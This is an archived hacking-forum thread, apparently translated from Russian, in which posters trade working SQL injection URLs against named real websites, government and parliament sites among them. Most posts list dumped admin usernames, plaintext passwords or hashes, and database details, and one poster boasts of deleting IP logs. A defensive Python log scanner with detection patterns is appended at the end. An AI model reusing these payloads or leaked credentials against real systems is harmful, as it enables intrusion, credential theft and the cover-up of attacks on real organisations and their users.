SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Cennarios

    http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat(username,0x3a3a,pass)+from+users+limit+2,1/*


    login:brianficek
    pass:85688717ef4fab9 mb md5 64 bit?
     
  2. SeNaP

    Database list
    http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,table_name,6,7+from+information_schema.tables/*

    DB jos_users
    http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,column_name,6,7+from+information_schema.columns+where+table_name=0x6a6f735f7573657273/*
    I can't view the data :(

    DB phpbb_users
    http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,column_name,6,7+from+information_schema.columns+where+table_name=0x70687062625f7573657273/*

    And once again I can't view it :(
    P.S. This is what I do: http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,4,username,6,7+from+phpbb_users+limit+1,1--

    Can you tell me what the problem is?
     
  3. nicusor


    http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,username,5,6,7+from+db4514a.phpbb_users/*

    You need to specify the database name as well
     
    1 person likes this.
  4. SeNaP

    LOGIN:Anton
    Password:majestic

    http://www.devchatnik.ru

    SQLi (http://www.devchatnik.ru/new/news.php?id=-12+union+select+1,2,3,concat_ws(0x3a,users_login,users_password),5,6,7+from+xz_users/*)

    P.S. I deleted the admin logs that recorded IPs
     
    1 person likes this.
  5. Cennarios

    I f...ed and wept...

    http://vli-info.ru/index.php?p=show_cont&parent_id=-1+union+select+1,2,3,concat(login,0x3a3a,password,0x3a3a,admin),5,6,7+from+users+limit+0,1

    login: admin pass:1q2w3e4r

    http://vli-info.ru/index.php?p=login

    The site's subject matter and the fact that it got hacked brought a little tear to my eye...
     
    1 person likes this.
  6. Rubaka

    http://www.bohnespring.ca/page.php?ID=4+union+select+1,2,user(),version(),5++limit+1,1/*

    [email protected]
    4.0.27-standard-log
     
  7. lastsmile

    http://www.michaelpollan.com/article.php?id=-1+union+select+1,version(),database(),4,5,6,user(),8,9,0+from+articles/*

    4.1.22-standard
    pollan_articles
    pollan_article@localhost
     
  8. $n@ke

    Dbname: stjohns
    Version: 4.1.20
    User: [email protected]
     
  9. SVAROG

    http://www.iped.com/cm.php?id=-38'+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+iped.user+limit+1,1/*
     
  10. Cennarios

    http://wmbuy.info/index.php?gid=-1+union+select+concat(0x3a3a,login,0x3a3a,password)+from+users+limit+1,1

    login:admin pass:ffffff
     
  11. Fugitif

    Code:
    http://fashion1001nights.net/productdetail.php?catId=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2,3/*

    Code:
    http://www.compel.com.tr/Include/Modules/ProductDetail.php?CatID=-1+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2/*
     
  12. errsec

    Hacked By Errsec

    Regarding the thread about Georgia. The website of the Parliament of Georgia

    The SIMPLEST hole, damn


    http://www.parliament.ge/index.php?lang_id=ENG&sec_id=1185&info_id=-20026+UNION+SELECT+1,2,3,4,5,6,7,password,9,10,11,12,13+FROM+users--

    user: dato@localhost
    version: 5.0.51a-log


    db: parliament
    db: users


    55e9a83d8533e24df2a3d444aedb48e8

    login: vivageodea
    pass: eannia


    http://www.parliament.ge/admin/
    access by IP, .htaccess

    whoever gets further, please post back
     
    #6452 errsec, 29 Aug 2008
    Last edited: 29 Aug 2008
  13. Cennarios

    http://imperialove.ru/main/index.html?id=102&parent_id=-1+union+select+1,2,3,4,5,concat(0x3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a3a,user_login,0x3a3a,user_password),7,8+from+sys_users+limit+1,1

    http://imperialove.ru/admin

    login:admin pass:Ximper2ia

    P.S.: 2 geforse Take your questions to the thread 'Your questions about vulnerabilities'!!!!
     
    1 person likes this.
  14. paulzey

    Code:
    http://www.olympicwatch.org/news.php?id=-1'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),%20database()),10/*
    olympicwatch_org_db@localhost:4.0.22:olympicwatch_org_db
    
    + path disclosure Warning: getimagesize(): Unable to access ./img/img_php/1_obrazek1.8 in /domains3/olympicwatch-org/ftp/www_root/news.php on line 67

    + there is a users table
    http://www.olympicwatch.org/news.php?id=-1'+union+select+1,2,3,id,5,6,7,8,user,10+from+users/*
    1
    olympicwatch-admin

    I couldn't guess the exact name of the field with the hash, so I had to pull it out in a cunning, ass-backwards way
    http://www.olympicwatch.org/news.php?id=-1'+union+select+*,1,2,3,4,5,6,7+from+users/*
    then a cunning join three times, since the fields were in positions that are not displayed
    http://www.olympicwatch.org/news.php?id=-1'+union+select+*,1+from+users+join+users+u+join+users+b/*

    Hash:f0b16007c9541482261c66376e8eaf03
    Couldn't crack it; the exact algorithm has not been determined. Given that users has three fields, there is (most likely) no salt there.
    Didn't manage to find anything particularly interesting. :(
     
    1 person likes this.
  15. Fugitif

    Code:
    http://www.termal.gov.tr/portal/modules/articles/article.php?id=1%20UNION%20SELECT%201,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

     
  16. -=megahertz=-

    Here are a few tasty SQL injections from me ;)

    Code:
    http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13/*
    iletisim (Id)
    kullanici_log
    kullanicilar(ID, kullanici, sifre)
    kurul_uyeler
    kurullar 
    sayfa_icerik (KatID)
    sayfalar (ID, sayfa_id, kullanici_id, sira, sayfa_adi, sayfa_adres, ust_id)
    smf_members(ID_MEMBER, memberName, lngfile, passwd, ICQ, AIM, YIM, MSN  )
    smf_moderators 
    urun 
    
    http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,column_name,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x696C65746973696D+limit+7,1/*
    http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,concat(ID,0x3a,kullanici,0x3a,sifre),6,7,8,9,10,11,12,13+from+kullanicilar+limit+0,1/*
    http://www.istanbulshcek.gov.tr/?Sayfa=Kurum&KTip=&ID=-173+UNION+SELECT+1,2,3,4,concat(ID_MEMBER,0x3a,memberName,0x3a,passwd,0x3a,ICQ),6,7,8,9,10,11,12,13+from+smf_members+limit+0,1/*
    
    Code:
    http://www.newportky.gov/inner_main.php?secid=-149+UNION+SELECT+concat(username,0x3a,password),2+from+users+limit+0,1/*
    Code:
    http://parl.gov.mn/who/whoswho.php?st=5&memid=-35059+UNION+SELECT+1,concat(username,0x3a,password),3+from+login/*,password),2+from+users/*
    http://parl.gov.mn/who/whoswho.php?st=5&memid=-35059+UNION+SELECT+1,2,3+from+mysql.user/*
    Code:
    http://www.president.mn/show_module.php?index=speech&speechid=-214+UNION+SELECT+1,concat(userid,0x3a,username,0x3a,loginname,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+user+limit+0,1/*
    
    Code:
    http://banten.go.id/?link=dtl&id=-2076+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
    Code:
    http://www.lincoln.gov.ar/index.php?seccion_generica_id=-36+UNION+SELECT+1,column_name,3+from+information_schema.columns++where+table_name=0x5553554152494F53+limit+23,1/*
    USUARIOS (USUARIO_ID, CLAVE, APELLIDO_NOMBRE, CIUDAD, ACCESO_ADMIN, PAIS...)

    Code:
    http://www.ondostate.gov.ng/news_details.php?id=-1741+UNION+SELECT+1,concat(id,0x3a,username,0x3a,password),3+from+admin+limit+0,1/*
     
    1 person likes this.
  17. warlok

    http://www.zaistinu.ru/articles/?sid=-29+union+select+version()
    version() - 5.0.32-Debian_7etch6-log
    user() - [email protected]
    database() - zaistinu_0001

    http://alterego.tut.by/library/showarticle.php?id=55+union+select+1,user(),version(),database(),5,6
    version() - 4.0.27-log
    user() - [email protected]
    database() - alteregotutby
     
  18. Shadow_p1raT

    Site: clas.ru
    Code:
    http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_Ws(0x3a,database(),version(),user()),5,6,7,8--
    User:u8122(sobaka)10.10.223.235
    Version:5.0.45-log
    Database:u8122_1gb_clas
    Tables:
    Code:
    bag
    buyers
    c_fields
    c_order_fields
    c_order_items
    c_orders
    colors
    comments
    companies
    counter
    countries
    deliveries
    delivery_fields
    delivery_paids
    distributors
    fasons
    genres
    groups
    ids
    kath
    links
    media
    messages
    movies
    news
    news_items
    opinions
    orderpositions
    orders
    paids
    people
    pic
    pic_any
    presence
    recences
    screensizes
    shirtmodels
    shirts
    shirtsgroup
    sizes
    staff
    staff_types
    subscribers
    t_dostavka
    t_news
    t_oplata
    t_rasskaz
    t_users
    texts
    translations
    users
    vote_details
    vote_items
    vote_list
    votes
    wanted
    book_wanted
    
    Couldn't dig any further, went to bed :(
     
    1 person likes this.
  19. USAkid

    Mm... let's help :)

    We go through the t_users table using limit
    Code:
    http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,column_name,5,6,7,8+from+information_schema.columns+where+table_name=0x745f7573657273+limit+0,1--
    We see interesting fields: id, pass... Also addresses, phone numbers, IP addresses, etc. In short, a good DB.

    Code:
    http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_ws(id,0x3a,pass),5,6,7,8+from+t_users--
    Umm, I didn't find a login. On to buyers.
    Code:
    http://www.clas.ru/people.php?id=-5952+union+select+1,2,3,concat_ws(login,0x3a,pass),5,6,7,8+from+buyers+limit+1,1--
    And here come the logins with passwords :)
     
    #6459 USAkid, 30 Aug 2008
    Last edited: 30 Aug 2008
    1 person likes this.
  20. Gorev

    http://www.terranita.ro/int/index.php?req=catalog&src=-10'+UNION+SELECT+1,2,table_name+from+information_schema.tables+limit+1,1/*&zid=1

    Database Version: 5.0.26
    Database name: terranita_facelift
    User name: terranita_user@localhost




    http://www.bogdanlobont.ro/ro/news/view?newsId=268+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10/*

    Database Version: 5.0.26
    Database name: lobont1
    User name: lobont@localhost
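
Added example, not part of the thread or any poster's code: a small access-log scanner a defender can run to spot the UNION-based request patterns quoted in the posts above, and to decode hex literals such as `0x745f7573657273` to see which table a request targeted. The log lines, client IPs and the `/item.php` and `/news.php` paths are constructed; the rule names and the "UNION SELECT or two other indicators" threshold are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Indicators modelled on the request patterns quoted in this thread.
RULES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "fingerprint": re.compile(r"\b(version|user|database)\s*\(\s*\)", re.I),
    "concat_dump": re.compile(r"\bconcat(_ws)?\s*\(", re.I),
    "trailing_comment": re.compile(r"(/\*|--)$"),
}
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IPs, placeholder paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Aug/2008:02:11:09 +0000] "GET /item.php?id=5952 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [30/Aug/2008:02:11:40 +0000] "GET /item.php?id=-5952+union+select+1,2,3,column_name,5,6,7,8+from+information_schema.columns+where+table_name=0x745f7573657273+limit+0,1-- HTTP/1.1" 200 5133',
    '198.51.100.23 - - [30/Aug/2008:02:15:02 +0000] "GET /news.php?id=12%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3/* HTTP/1.1" 200 4410',
    '198.51.100.9 - - [30/Aug/2008:02:16:00 +0000] "GET /search.php?q=trade+union+history HTTP/1.1" 200 900',
]


def decode_hex_literals(value):
    """Recover identifiers hidden in 0x.. literals, e.g. a targeted table name."""
    texts = (bytes.fromhex(m.group(1)).decode("latin-1")
             for m in HEX_LITERAL.finditer(value))
    return [t for t in texts if t.isprintable() and any(c.isalnum() for c in t)]


def inspect_line(line):
    """Return a finding for one combined-format log line, or None if clean."""
    m = REQUEST.search(line)
    if not m:
        return None
    client, target = m.groups()
    # parse_qsl percent-decodes values and turns '+' into spaces.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits = sorted(k for k, rx in RULES.items() if rx.search(value.strip()))
        if "union_select" in hits or len(hits) >= 2:
            return {"client": client, "param": name, "rules": hits,
                    "identifiers": decode_hex_literals(value)}
    return None


if __name__ == "__main__":
    for finding in filter(None, map(inspect_line, SAMPLE_LOG)):
        print(finding)
```

A numeric parameter such as `id` that arrives carrying any of these tokens is also a sign that the application is not casting it to an integer or binding it as a query parameter.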
     